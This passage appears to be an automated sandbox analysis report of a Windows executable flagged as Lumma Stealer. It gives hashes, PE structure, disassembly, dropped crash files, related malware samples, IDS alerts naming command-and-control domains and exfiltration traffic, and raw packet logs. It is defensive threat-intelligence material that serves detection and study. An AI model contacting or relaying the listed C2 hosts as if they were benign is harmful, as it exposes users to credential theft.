	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	HouseholdsClicking.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	davies.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	FeedStation.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	DodSussex.exe	Get hash	malicious	LummaC Stealer	Browse	104.102.49.254

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	rACq8Eaix6.exe	Get hash	malicious	FormBook	Browse	104.21.88.139
	JWPRnfqs3n.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	xNuh0DUJaG.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	b6AGgIJ87g.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	ZaRP7yvL1J.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	grrezORe7h.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.96.1
	14lVOjBoI2.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.32.1
	Qg79mitNvD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.64.1
	fqbVL4XxCr.exe	Get hash	malicious	FormBook	Browse	104.21.112.1
AKAMAI-ASUS	xNuh0DUJaG.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Setup.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	Setup.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Bontrageroutdoors_Project_Update_202557516.pdf	Get hash	malicious	Unknown	Browse	96.17.64.171
	invoice_AG60538.pdf	Get hash	malicious	Unknown	Browse	96.17.64.171
	Message 2.eml	Get hash	malicious	Unknown	Browse	104.102.34.105
	frosty.spc.elf	Get hash	malicious	Mirai	Browse	95.101.248.46
	Message.eml	Get hash	malicious	Unknown	Browse	184.28.90.27
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	104.102.49.254

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	xNuh0DUJaG.exe	Get hash	malicious	LummaC	Browse	104.21.48.1 104.102.49.254
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.48.1 104.102.49.254
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.48.1 104.102.49.254
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.48.1 104.102.49.254
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1 104.102.49.254
	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse	104.21.48.1 104.102.49.254
	Mmm7GmDcR4.exe	Get hash	malicious	LummaC	Browse	104.21.48.1 104.102.49.254
	random.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1 104.102.49.254
	HouseholdsClicking.exe	Get hash	malicious	LummaC	Browse	104.21.48.1 104.102.49.254

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Q7QR4k52HL.exe_6efd3e7de76eabc1b11f8121be247ddac26fafd0_fed671df_736b4876-c6ee-4a4a-a2cf-0f6fb449af83\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0649495338972557
Encrypted:	false
SSDEEP:	192:xUNi+32Y0YKqhljsFmF5zuiFyZ24IO8CV:yi+32zYKqhljD5zuiFyY4IO8CV
MD5:	CA0781D9DEED0C8D2E8B0DC6AA922000
SHA1:	FA0E9109AB1518D69089BBBED0337838007512D1
SHA-256:	00A2ADA531BE62D528D512A061616EBE722017CF09F0022F5D12F4AB549349A9
SHA-512:	F55101E3F7F7A194A6D1AAFBA3ECCCBF80FEEB094D3C81FE07DF7D197C1688417E53AE173B04B1FE0E13508CEE2B2D129CC78D7255CE9A18DBCB58CDC8D33818
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.5.2.7.6.0.4.0.1.6.2.4.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.0.5.2.7.6.1.0.4.2.2.6.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.3.6.b.4.8.7.6.-.c.6.e.e.-.4.a.4.a.-.a.2.c.f.-.0.f.6.f.b.4.4.9.a.f.8.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.8.6.8.e.b.1.1.-.f.1.9.6.-.4.e.5.b.-.b.7.4.1.-.a.2.3.b.8.9.3.f.4.f.c.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Q.7.Q.R.4.k.5.2.H.L...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.e.0.-.0.0.0.1.-.0.0.1.4.-.a.9.7.f.-.b.d.3.e.f.7.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.3.c.a.d.6.2.7.6.5.8.2.3.6.b.e.4.f.9.9.4.5.a.9.1.a.c.4.5.2.0.6.0.0.0.0.4.2.0.7.!.0.0.0.0.0.a.0.d.7.9.5.5.d.e.a.8.5.4.3.9.1.d.4.2.7.3.5.a.b.8.a.a.c.6.5.4.1.3.b.6.2.5.0.b.!.Q.7.Q.R.4.k.5.2.H.L...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFA25.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sat Jan 11 07:06:00 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	111922
Entropy (8bit):	2.2277741320848237
Encrypted:	false
SSDEEP:	384:31FOC6l7BxFoDsYB1IYLkjzYAYf8ozuUDagZv3DN:31s1l7BusYBS+AoLRTZv3D
MD5:	2E5A2F321D958C998E135C2F9433E78A
SHA1:	4F6E04CF85E5EB47A4F4737C90CF2ED7F7776A80
SHA-256:	2AA024647E065E43AAFBF042D2ADCD651200B9C9ED5F23D1B4E01E6E8DA40D5C
SHA-512:	5BF1EA96A6E427E03457087131750229F068706F4BD0998B0546BEEFAAD4CAA2AEFB4A86000B0C133369315407DBEC8661D511A29BF12CEB8C4411E9EE326F65
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......X..g........................p...............h$...........P..........`.......8...........T...........8F...n..........\|%..........h'..............................................................................eJ.......(......GenuineIntel............T...........M..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB9D.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8424
Entropy (8bit):	3.6987995847342408
Encrypted:	false
SSDEEP:	192:R6l7wVeJkjL6Y56Y9iSU9xGgmfDJL4pDO89bf67sfCVm:R6lXJeL6Y56YoSU9xGgmfDJLyf6Afp
MD5:	942285231FB6EA3E0BA307D4028E5838
SHA1:	3929B33A8BDFE8F0C83333B3CF2EEAF0793837D1
SHA-256:	83E3FB64A8843219981B454E2447B7D8AF9A9C05E619EE80A78E71AB5A15E2E8
SHA-512:	0DC27ECC9673364D1B32CEF505E6C43B0DB263A5C99398D913E64B868985908EFBE7EBA5EEC7DD3A73FFE9D8ADD085D89AEF68E46782D8E77ED80893BD84F295
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.1.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBCD.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4724
Entropy (8bit):	4.4910262203461
Encrypted:	false
SSDEEP:	48:cvIwWl8zsAJg77aI9CicWpW8VYXYm8M4JJPO3F/r+q8v/POeCPZwad:uIjfGI79V7VfJtSrK3pEwad
MD5:	C0A8D7A955438F55F752713BE9198432
SHA1:	41DE95F6F264E85D62B100E2ACEF141301604AC4
SHA-256:	CD3B2A4705359CD64C4B697B09D1FCC66A70F9796643A7A0AF0DDE00BFEBC515
SHA-512:	BD4B3476B33CC984C1A8A3E8AE7A15D37584E7372EC3408CA17A50999F6E07DF57BC665C71FCD868A1521BC7D0C104E25687FE7E56B6AB503E06F1B7DB0EED31
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670928" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465426440504498
Encrypted:	false
SSDEEP:	6144:/IXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNwdwBCswSbE:wXD94+WlLZMM6YFHe+E
MD5:	041E8B612AF10AA1D5BAD6DA0ED1CBD2
SHA1:	4BEBD2D7CA0DA96BF10FD79B7317F19178C1BEB9
SHA-256:	74B29C964139F1F0CF9528A75502ABB6A8C29D335D1F67CB539E22491BFD2E9B
SHA-512:	820145D8CF816A286F8FE84C27C91DFD68ADA69A31DD5A71BC2739431A8897382CB6BCEF32ED6AFB3BE7027C355DB241EC47B819BC67DC156E2FAD7C8CD0A7FF
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.3.D.c.................................................................................................................................................................................................................................................................................................................................................p........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.324214872542696
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Q7QR4k52HL.exe
File size:	333'312 bytes
MD5:	1b513e6f8721e444a9364dd93630f015
SHA1:	0a0d7955dea854391d42735ab8aac65413b6250b
SHA256:	9185b7955fdbfce261dfb295163dd00a8ae71d77f28f675cf4e5c14017281575
SHA512:	85394825d6bb71ca176ce8771e7a8eaeeef3d4ab692151d896c4fb410ab32fa3b0c5307bc8f3c41e947a15dc19e9b2a024d2bad5b30aca80083d73ebb94be94c
SSDEEP:	6144:WbIULHOg8QOYJAAjVKuL8aC0rL0hFbE1hHYa3FFeMqVB9xPsCL7GvFKBCpCSV:Wv7OhYljVNLJRMhFbE11lXVs9FjGtEC
TLSH:	F664F101B4D2C871D84754319924DAE0B67F78B16AA5979B33483F2FEE703C1AB7A346
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r...6.k.6.k.6.k.....7.k.(.....k.(...(.k.(...L.k..Q..5.k.6.j.C.k.(...7.k.(...7.k.(...7.k.Rich6.k.................PE..L......e...

File Icon


Icon Hash:	714549114144446b

Static PE Info

General

Entrypoint:	0x405eb5
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x65CC9A02 [Wed Feb 14 10:46:26 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	aacf07d3d4ac7a5415783f64b2fa492d

Entrypoint Preview

Instruction
call 00007F43BCACCFE4h
jmp 00007F43BCAC975Eh
int3
call 00007F43BCAC991Ch
xchg cl, ch
jmp 00007F43BCAC9904h
call 00007F43BCAC9913h
fxch st(0), st(1)
jmp 00007F43BCAC98FBh
fabs
fld1
mov ch, cl
xor cl, cl
jmp 00007F43BCAC98F1h
mov byte ptr [ebp-00000090h], FFFFFFFEh
fabs
fxch st(0), st(1)
fabs
fxch st(0), st(1)
fpatan
or cl, cl
je 00007F43BCAC98E6h
fldpi
fsubrp st(1), st(0)
or ch, ch
je 00007F43BCAC98E4h
fchs
ret
fabs
fld st(0), st(0)
fld st(0), st(0)
fld1
fsubrp st(1), st(0)
fxch st(0), st(1)
fld1
faddp st(1), st(0)
fmulp st(1), st(0)
ftst
wait
fstsw word ptr [ebp-000000A0h]
wait
test byte ptr [ebp-0000009Fh], 00000001h
jne 00007F43BCAC98E7h
xor ch, ch
fsqrt
ret
pop eax
jmp 00007F43BCACA76Fh
fstp st(0)
fld tbyte ptr [0044407Ah]
ret
fstp st(0)
or cl, cl
je 00007F43BCAC98EDh
fstp st(0)
fldpi
or ch, ch
je 00007F43BCAC98E4h
fchs
ret
fstp st(0)
fldz
or ch, ch
je 00007F43BCAC98D9h
fchs
ret
fstp st(0)
jmp 00007F43BCACA745h
fstp st(0)
mov cl, ch
jmp 00007F43BCAC98E2h
call 00007F43BCAC98AEh
jmp 00007F43BCACA750h
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
add esp, FFFFFD30h
push ebx
wait
fstcw word ptr [ebp+00000000h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x42bdc	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4d000	0x8b28	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4720	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x17c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x42470	0x42600	3730ce9ae47e912a3bc427ce9519b690	False	0.8794138418079096	data	7.809678678911755	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x44000	0x86e4	0x6000	3a6d11e940b06524ad17b89bc7f04ce0	False	0.0806884765625	data	0.9441870918946834	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4d000	0xbb28	0x8c00	881184f1ea0f7889dd4ae927a8a20bfe	False	0.42578125	data	4.671937452413612	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x532b0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.26439232409381663
RT_CURSOR	0x54158	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.3686823104693141
RT_CURSOR	0x54a00	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.49060693641618497
RT_ICON	0x4d3c0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Romanian	Romania	0.43390191897654584
RT_ICON	0x4e268	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Romanian	Romania	0.5523465703971119
RT_ICON	0x4eb10	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Romanian	Romania	0.5846774193548387
RT_ICON	0x4f1d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Romanian	Romania	0.6047687861271677
RT_ICON	0x4f740	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Romanian	Romania	0.44367219917012446
RT_ICON	0x51ce8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Romanian	Romania	0.4948405253283302
RT_ICON	0x52d90	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Romanian	Romania	0.5212765957446809
RT_STRING	0x551b0	0x63e	data	Romanian	Romania	0.4311639549436796
RT_STRING	0x557f0	0x338	data	Romanian	Romania	0.4696601941747573
RT_ACCELERATOR	0x53260	0x50	data	Romanian	Romania	0.8125
RT_GROUP_CURSOR	0x54f68	0x30	data			0.9166666666666666
RT_GROUP_ICON	0x531f8	0x68	data	Romanian	Romania	0.6826923076923077
RT_VERSION	0x54f98	0x218	data			0.5223880597014925

Imports

DLL

Import

KERNEL32.dll

InterlockedIncrement, EnumCalendarInfoW, GetCurrentProcess, InterlockedCompareExchange, WriteConsoleInputA, EnumCalendarInfoExW, GetWindowsDirectoryA, EnumTimeFormatsW, LoadLibraryW, SetCommConfig, SwitchToFiber, GetConsoleAliasExesLengthW, GetVersionExW, FindNextVolumeW, GetAtomNameW, GetModuleFileNameW, FindNextVolumeMountPointW, GetShortPathNameA, InterlockedExchange, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, CreateJobSet, LoadLibraryA, InterlockedExchangeAdd, EnumDateFormatsA, SetLocaleInfoW, FindNextFileW, OpenEventW, ReadConsoleInputW, GetCurrentProcessId, OpenFileMappingA, EnumSystemLocalesW, GetModuleHandleW, Sleep, ExitProcess, GetStartupInfoW, HeapFree, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, DeleteCriticalSection, SetFilePointer, EnterCriticalSection, LeaveCriticalSection, CloseHandle, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, WriteFile, GetModuleFileNameA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapAlloc, HeapReAlloc, RaiseException, GetModuleHandleA, SetStdHandle, RtlUnwind, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, HeapSize, GetLocaleInfoA, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Romanian	Romania

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T08:05:51.771132+0100	2059088	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click)	1	192.168.2.4	59603	1.1.1.1	53	UDP
2025-01-11T08:05:51.783603+0100	2059051	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop)	1	192.168.2.4	49715	1.1.1.1	53	UDP
2025-01-11T08:05:51.796137+0100	2059041	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop)	1	192.168.2.4	61422	1.1.1.1	53	UDP
2025-01-11T08:05:51.809135+0100	2059035	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop)	1	192.168.2.4	64312	1.1.1.1	53	UDP
2025-01-11T08:05:51.819426+0100	2059039	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop)	1	192.168.2.4	65127	1.1.1.1	53	UDP
2025-01-11T08:05:51.829550+0100	2059057	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop)	1	192.168.2.4	64183	1.1.1.1	53	UDP
2025-01-11T08:05:51.860815+0100	2059037	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop)	1	192.168.2.4	49771	1.1.1.1	53	UDP
2025-01-11T08:05:51.948422+0100	2059043	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop)	1	192.168.2.4	55486	1.1.1.1	53	UDP
2025-01-11T08:05:51.960576+0100	2059049	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop)	1	192.168.2.4	59369	1.1.1.1	53	UDP
2025-01-11T08:05:52.639698+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	104.102.49.254	443	TCP
2025-01-11T08:05:53.402632+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	49730	104.102.49.254	443	TCP
2025-01-11T08:05:54.001247+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	104.21.48.1	443	TCP
2025-01-11T08:05:54.410114+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49731	104.21.48.1	443	TCP
2025-01-11T08:05:54.410114+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	104.21.48.1	443	TCP
2025-01-11T08:05:55.089181+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	104.21.48.1	443	TCP
2025-01-11T08:05:55.542115+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49732	104.21.48.1	443	TCP
2025-01-11T08:05:55.542115+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49732	104.21.48.1	443	TCP
2025-01-11T08:05:56.589567+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	104.21.48.1	443	TCP
2025-01-11T08:05:57.196051+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49733	104.21.48.1	443	TCP
2025-01-11T08:05:57.796598+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	104.21.48.1	443	TCP
2025-01-11T08:05:59.377834+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49735	104.21.48.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 08:05:51.994448900 CET	49730	443	192.168.2.4	104.102.49.254
Jan 11, 2025 08:05:51.994513035 CET	443	49730	104.102.49.254	192.168.2.4
Jan 11, 2025 08:05:51.994596004 CET	49730	443	192.168.2.4	104.102.49.254
Jan 11, 2025 08:05:51.998223066 CET	49730	443	192.168.2.4	104.102.49.254
Jan 11, 2025 08:05:51.998239994 CET	443	49730	104.102.49.254	192.168.2.4
Jan 11, 2025 08:05:52.639523029 CET	443	49730	104.102.49.254	192.168.2.4
Jan 11, 2025 08:05:52.639698029 CET	49730	443	192.168.2.4	104.102.49.254
Jan 11, 2025 08:05:52.694993019 CET	49730	443	192.168.2.4	104.102.49.254
Jan 11, 2025 08:05:52.695058107 CET	443	49730	104.102.49.254	192.168.2.4
Jan 11, 2025 08:05:52.696072102 CET	443	49730	104.102.49.254	192.168.2.4
Jan 11, 2025 08:05:52.737375975 CET	49730	443	192.168.2.4	104.102.49.254
Jan 11, 2025 08:05:52.975558043 CET	49730	443	192.168.2.4	104.102.49.254
Jan 11, 2025 08:05:53.019360065 CET	443	49730	104.102.49.254	192.168.2.4
Jan 11, 2025 08:05:53.402741909 CET	443	49730	104.102.49.254	192.168.2.4
Jan 11, 2025 08:05:53.402803898 CET	443	49730	104.102.49.254	192.168.2.4
Jan 11, 2025 08:05:53.402822971 CET	49730	443	192.168.2.4	104.102.49.254
Jan 11, 2025 08:05:53.402854919 CET	443	49730	104.102.49.254	192.168.2.4
Jan 11, 2025 08:05:53.402875900 CET	443	49730	104.102.49.254	192.168.2.4
Jan 11, 2025 08:05:53.402877092 CET	49730	443	192.168.2.4	104.102.49.254
Jan 11, 2025 08:05:53.402898073 CET	443	49730	104.102.49.254	192.168.2.4
Jan 11, 2025 08:05:53.402908087 CET	49730	443	192.168.2.4	104.102.49.254
Jan 11, 2025 08:05:53.402928114 CET	49730	443	192.168.2.4	104.102.49.254
Jan 11, 2025 08:05:53.402949095 CET	49730	443	192.168.2.4	104.102.49.254
Jan 11, 2025 08:05:53.503967047 CET	443	49730	104.102.49.254	192.168.2.4
Jan 11, 2025 08:05:53.504041910 CET	443	49730	104.102.49.254	192.168.2.4
Jan 11, 2025 08:05:53.504060030 CET	49730	443	192.168.2.4	104.102.49.254
Jan 11, 2025 08:05:53.504086971 CET	443	49730	104.102.49.254	192.168.2.4
Jan 11, 2025 08:05:53.504112959 CET	49730	443	192.168.2.4	104.102.49.254
Jan 11, 2025 08:05:53.504128933 CET	49730	443	192.168.2.4	104.102.49.254
Jan 11, 2025 08:05:53.509042025 CET	443	49730	104.102.49.254	192.168.2.4
Jan 11, 2025 08:05:53.509108067 CET	49730	443	192.168.2.4	104.102.49.254
Jan 11, 2025 08:05:53.509126902 CET	443	49730	104.102.49.254	192.168.2.4
Jan 11, 2025 08:05:53.509161949 CET	49730	443	192.168.2.4	104.102.49.254
Jan 11, 2025 08:05:53.509171963 CET	443	49730	104.102.49.254	192.168.2.4
Jan 11, 2025 08:05:53.509263992 CET	443	49730	104.102.49.254	192.168.2.4
